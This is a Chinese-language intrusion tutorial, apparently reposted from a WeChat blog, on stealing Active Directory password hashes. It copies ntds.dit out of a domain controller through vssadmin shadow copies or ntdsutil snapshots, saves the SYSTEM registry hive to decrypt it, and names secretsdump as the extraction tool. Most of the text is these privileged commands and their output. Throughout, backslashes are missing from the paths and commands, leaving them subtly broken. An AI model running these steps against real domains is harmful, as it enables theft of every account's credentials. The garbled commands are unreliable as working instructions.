Ntds.dit
在活动⽬录中,所有的数据都保存在域控的ntds.dit⽂件中。 ntds.dit是⼀ 个⼆进制⽂件,⽂件路径为域控的%SystemRoot%ntdsntds.dit。NTDS.dit 包 含不限于⽤户名、散列值、组、GPP、OU等活动⽬录的信息。系统运维⼈员可以使⽤VSS实 现对该⽂件的导出和复制
说白了这玩意就是ad的数据库,但是这个东西又是加密的,需要system注册表才能解密。
VSS (Volume Shadow copy Service, 卷映射拷⻉服务)
在一般情况下,Ntds.dit是默认被Windows系统锁定的,想要读取该文件就要利用卷影拷贝服务(Volume Shadow Copy Service,VSS),得到Ntds.dit文件的副本。卷影拷贝服务(VSS)本质上是属于快照技术的一种,主要用于备份和恢复,即使目标文件被处于锁定状态。
导出ntds:方法一(需管理员权限)
vssadmin是Windows上的一个卷影拷贝服务的命令行管理工具,可用于创建和删除卷影拷贝、列出卷影拷贝的信息,显示已安装的所有卷影拷贝写入程序和提供程序,以及改变卷影拷贝的存储空间的大小等。
其适用于: Windows 10,Windows 8.1,Windows Server 2016,Windows Server 2012 R2,Windows Server 2012,Windows Server 2008 R2,Windows Server 2008
创建一个c盘卷影拷贝
vssadmin create shadow /for=C:
#执行结果:
C:Windowssystem32>vssadmin create shadow /for=C:
vssadmin 1.1 - 卷影复制服务管理命令行工具
(C) 版权所有 2001-2005 Microsoft Corp.
成功地创建了 'C:' 的卷影副本
卷影副本 ID: {e110f046-0d04-46a0-a8b3-b025b59a2674}
卷影副本卷名: \?GLOBALROOTDeviceHarddiskVolumeShadowCopy3
将卷影中的ntds文件复制到c盘
copy \?GLOBALROOTDeviceHarddiskVolumeShadowCopy3windowsntdsntds.dit C:ntds.dit
删除卷影
vssadmin delete shadows /for=c: /quiet
导出ntds:方法二 (需管理员权限)
#创建快照,完成后将会⽣成⼀个GUID
ntdsutil snapshot "activate instance ntds" create quit quit
#使⽤GUID挂载快照
ntdsutil snapshot "mount {6affcd44-c838-424c-885b-468464faa975}" quit quit
ntdsutil snapshot "mount {bb2a7e48-300c-4eae-9e29-98b7d926b42a}" quit quit
#挂载的⽂件⽂件复制到 c:tempntds.dit
copy C:$SNAP_202202182022_VOLUMEC$windowsntdsntds.dit c:tempntds.dit
#卸载快照并删除快照
ntdsutil snapshot "mount {bb2a7e48-300c-4eae-9e29-98b7d926b42a}" "delete {bb2a7e48-300c-4eae-9e29-98b7d926b42a}" quit quit
#查询当前系统中的所有快照
ntdsutil snapshot "List All" quit quit
导出system注册表
reg save hklmsystem c:system
#保存system⽂件
现在我们已经拿到了NTDS.dit和system注册表
解密
windows10魔改版的里面有一个工具secretsdump.exe
原文始发于微信公众号(剑外思归客):内网渗透Dump Hash之NTDS.dit
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论